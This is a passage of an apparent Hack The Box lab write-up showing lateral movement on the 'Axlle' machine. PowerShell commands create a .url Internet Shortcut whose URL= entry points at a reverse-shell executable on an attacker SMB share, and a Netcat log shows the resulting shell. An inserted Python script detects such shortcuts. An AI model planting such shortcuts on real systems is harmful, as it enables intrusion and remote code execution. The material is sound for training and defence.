Windows Internet Shortcut
Windows Internet Shortcut files, typically with the .url extension, are used to store the URL of a web page. These files are plain text and contain the internet address along with metadata such as the icon location and working directory. When double-clicked, they open the specified URL in the user’s default web browser. They are commonly used for quickly accessing websites or organizing web links on a desktop or within a file system.

Windows Internet Shortcut files can be exploited by embedding malicious URLs, leading to phishing attacks or drive-by downloads when opened, potentially compromising the system. Attackers can also manipulate these files to execute arbitrary commands or scripts by exploiting the way Windows handles certain parameters within the shortcut.

The most important thing here is that there is no restriction on the protocol used in the URL= entry, which is what makes this a well-known trick among adversaries.

PS C:\inetpub\testing> $url = "file:////10.10.14.110/smb/r.exe"
PS C:\inetpub\testing> $shortcutPath = "C:\inetpub\testing\shortcut.url"
PS C:\inetpub\testing> $shortcutContent = "[InternetShortcut]`r`nURL=$url"
PS C:\inetpub\testing> Set-Content -Path $shortcutPath -Value $shortcutContent

Using the PowerShell cmdlet Set-Content to generate a Windows Internet Shortcut file, shortcut.url, whose URL= entry points at the reverse shell executable payload on the SMB share

PS C:\inetpub\testing> cat shortcut.url
[InternetShortcut]
URL=file:////10.10.14.110/smb/r.exe

There it is
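As an added defender-side example (not part of the original write-up), this Python script parses the URL= target of a .url file and flags the case shown above, a file:// link whose host is a remote machine, while letting ordinary web links and local files through. The sample content is constructed from the shortcut above; the function names are my own.

```python
"""Triage Windows Internet Shortcut (.url) files by what their URL= entry points at."""
import configparser
from urllib.parse import urlparse

WEB_SCHEMES = {"http", "https"}


def parse_url_shortcut(text: str) -> dict:
    """Return the key/value pairs of the [InternetShortcut] section, keys lower-cased."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text.replace("\r\n", "\n"))
    section = next((s for s in cp.sections() if s.lower() == "internetshortcut"), None)
    if section is None:
        raise ValueError("no [InternetShortcut] section")
    return dict(cp[section])


def triage_shortcut(text: str) -> dict:
    """Classify the URL= target: scheme, remote host (if any) and a verdict string."""
    target = parse_url_shortcut(text).get("url", "").strip()
    if target.startswith("\\\\"):  # bare UNC path with no scheme at all
        host = target.lstrip("\\").split("\\")[0]
        return {"scheme": "unc", "host": host, "verdict": "suspicious"}
    parsed = urlparse(target)
    scheme = parsed.scheme.lower()
    host = parsed.hostname or ""
    if scheme == "file":
        # "file:////host/share/x" parses with an empty netloc and the host at the
        # start of the path, so recover it from there
        if not host and parsed.path.startswith("//"):
            host = parsed.path.lstrip("/").split("/")[0]
        verdict = "suspicious" if host and host.lower() != "localhost" else "local-file"
    elif scheme in WEB_SCHEMES:
        verdict = "web"
    elif scheme == "":
        verdict = "no-scheme"
    else:
        verdict = "unexpected-scheme"  # anything exotic deserves a look
    return {"scheme": scheme or "none", "host": host, "verdict": verdict}


# Constructed sample, mirroring the shortcut.url shown in the write-up.
SAMPLE = "[InternetShortcut]\r\nURL=file:////10.10.14.110/smb/r.exe"

if __name__ == "__main__":
    print(triage_shortcut(SAMPLE))  # {'scheme': 'file', 'host': '10.10.14.110', 'verdict': 'suspicious'}
```

Feed it the bytes of every *.url found under user profiles or a share and alert on anything that is not "web" or "local-file".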

A moment later, I get a callback on my Netcat listener on Kali

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ nnc 8888     
listening on [any] 8888 ...
connect to [10.10.14.110] from (UNKNOWN) [10.10.11.21] 57393
Microsoft Windows [Version 10.0.20348.2527]
(c) Microsoft Corporation. All rights reserved.
 
C:\>whoami
whoami
axlle\dallon.matrix
 
C:\>hostname
hostname
MAINFRAME
 
C:\>ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::22b
   IPv6 Address. . . . . . . . . . . : dead:beef::5697:caf:1789:6119
   Link-local IPv6 Address . . . . . : fe80::3dc:8d8c:bde5:350%11
   IPv4 Address. . . . . . . . . . . : 10.10.11.21
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1bd3%11
                                       10.10.10.2

Lateral movement to the dallon.matrix user achieved via a Windows Internet Shortcut file